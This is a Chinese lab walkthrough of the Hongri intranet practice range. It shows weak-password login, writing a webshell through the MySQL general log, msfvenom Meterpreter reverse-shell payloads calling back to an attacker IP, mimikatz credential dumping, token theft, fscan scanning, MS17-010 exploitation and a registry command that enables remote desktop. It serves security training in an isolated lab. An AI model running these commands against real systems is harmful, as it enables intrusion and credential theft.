红日靶场1---内网学习

渗透

一句话木马参数使用----测试

Nmap 扫网段

dirsearch -u  http://192.168.20.104/ 扫目录

Phpadmin利用方式---开启日志----使用一句话木马

公告日志中写入一句话木马

Hackbar结合一句话

----------------------------------------------------------------------------------------------------------------------------

默认密码:hongrisec@2019

一.环境搭建

红日靶场1---内网学习_第1张图片

网卡学习

一个网卡一个分段,想象成一个管道

192.168.52一段

192.168.150一段

红日靶场1---内网学习_第2张图片

仅主机模式保证不予外界连通,保证恶意操作不会跑到真实机之上

52段是内部通信,150段属于服务器(win7)与kali通信

任务从win7拿到内部域控

 

 

 开启phpstudy,通过外部访问IP

红日靶场1---内网学习_第3张图片

kali机器试探能否访问

红日靶场1---内网学习_第4张图片

访问成功

红日靶场1---内网学习_第5张图片

 红日靶场1---内网学习_第6张图片

 搭建成功

--------------------------------------------------------------------------------------------------------------

1.端口扫描

拿到IP扫端口

nmap -p-  192.168.20.104

红日靶场1---内网学习_第7张图片

 2.弱口令检测

root----root

红日靶场1---内网学习_第8张图片

 3.爆破一下web目录

dirsearch -u http://192.168.20.104/

 红日靶场1---内网学习_第9张图片

尝试登录下面两个路径

 红日靶场1---内网学习_第10张图片

 红日靶场1---内网学习_第11张图片

日志导出的模块是关闭的,要把他更改成打开

 红日靶场1---内网学习_第12张图片

 设置打开

set global general_log = "on"

红日靶场1---内网学习_第13张图片

set global general_log_file="C:/phpStudy/WWW/404.php"

 红日靶场1---内网学习_第14张图片

设置之后再一次的执行任何操作都会被记录到404这个日志当中

所有运行的指令都会写入到404这个文件中

红日靶场1---内网学习_第15张图片

 

所以我们可以尝试写入一个一句话木马

先尝试一下phpinfo

SELECT ""

红日靶场1---内网学习_第16张图片

成功

 红日靶场1---内网学习_第17张图片

试探路径

红日靶场1---内网学习_第18张图片

 注意公告

红日靶场1---内网学习_第19张图片

红日靶场1---内网学习_第20张图片

红日靶场1---内网学习_第21张图片

红日靶场1---内网学习_第22张图片

加一句话木马

红日靶场1---内网学习_第23张图片

访问路径文件(路径出现的莫名其妙,但是主要是学习内网,不用管)

http://192.168.20.104/yxcms/protected/apps/default/view/default/info.php

 

  用hackbar传输数据,注意hackbar的用法

红日靶场1---内网学习_第24张图片

 测试成功之后哥斯拉上线

路径

http://192.168.20.104/yxcms/protected/apps/default/view/default/info.php

红日靶场1---内网学习_第25张图片

 一个域内用户

getshell之后穿内网

上线MSF

msfdb run 先启动数据库,再启动msf

生成payload

msf6 > use payload/windows/x64/meterpreter/reverse_tcp
set lhost 192.168.52.128 
set lport 5555
generate -f exe -o 64.exe

 第二种生成payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.128 lport=5555 -f exe -o 64_2.exe

红日靶场1---内网学习_第26张图片

上传exp

红日靶场1---内网学习_第27张图片

 然后开启监听端口

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

 红日靶场1---内网学习_第28张图片

  执行之后发现回连回来一个shell

监听成功之后会得到一个meterpreter的监听会话

 

进入shell

红日靶场1---内网学习_第29张图片

查看域内信息

net config workstation

 红日靶场1---内网学习_第30张图片

 修改编码

chcp 65001

红日靶场1---内网学习_第31张图片

红日靶场1---内网学习_第32张图片

查看域控的IP

net time /domain

红日靶场1---内网学习_第33张图片

不知所谓的错误,假设拿到了域控

ping域控之后返回的IP就是域控的IP

红日靶场1---内网学习_第34张图片

出现了两台主机

 红日靶场1---内网学习_第35张图片

 ping一下又出现了IP

红日靶场1---内网学习_第36张图片

反弹shell之后抓取口令和令牌

本机的hash

 启动mimikaz

load kiwi

红日靶场1---内网学习_第37张图片

执行命令,发现需要管理员权限,提权

红日靶场1---内网学习_第38张图片

可以抓到域内的明文

红日靶场1---内网学习_第39张图片

此处可以先猜测一下这个Administrator是不是域管理员

Administrator  GOD.ORG  hongrisec@2019

怎么去看

进入shell------到c:/-------net group "domain admins" /domain

net group "domain admins" /domain

红日靶场1---内网学习_第40张图片

 发现该管理员就是该域的管理员

然后横向利用CS能够拿下域控

首先尝试偷令牌

红日靶场1---内网学习_第41张图片

选择这个

migrate 2268

偷取完成

红日靶场1---内网学习_第42张图片

然后验证他是不是域管理员,分别访问两个域

然后让他上线

 红日靶场1---内网学习_第43张图片

use 4

使用第四个

红日靶场1---内网学习_第44张图片

https://huaweicloud.csdn.net/635643e1d3efff3090b5ccfd.html

上线不成功,目前是要了解内网情况

用meterpreter上传fscan文件,在目标机上扫描然后结果返回

红日靶场1---内网学习_第45张图片

这个错误就是要把文件放到指定的文件夹中才能上传

红日靶场1---内网学习_第46张图片

 

 上传成功

fscan64 -h 192.168.52.0/24  

执行扫描命令

红日靶场1---内网学习_第47张图片

 红日靶场1---内网学习_第48张图片

域控 

两个内网机器

都有MS17-010

search ms17-010

使用漏洞攻击

红日靶场1---内网学习_第49张图片

有一个是32位的服务器,使用漏洞无法攻击成功

设置rhosts=192.168.52.141(内网机器)

 红日靶场1---内网学习_第50张图片

攻击

成功

红日靶场1---内网学习_第51张图片

 

 成功拿到

下一个使用ms17-010全版本的模块

使用模块2

红日靶场1---内网学习_第52张图片

 设置一下命令和rhost

 红日靶场1---内网学习_第53张图片

 

红日靶场1---内网学习_第54张图片

很明显此处执行成功之后并且回显

红日靶场1---内网学习_第55张图片

 此时已经拿下了这台服务器

但是把命令修改成连接远程桌面

##开启win 2003 的远程桌面

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

##关闭win 2003 的远程桌面

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

 命令修改为开启远程桌面

红日靶场1---内网学习_第56张图片

你可能感兴趣的:(学习)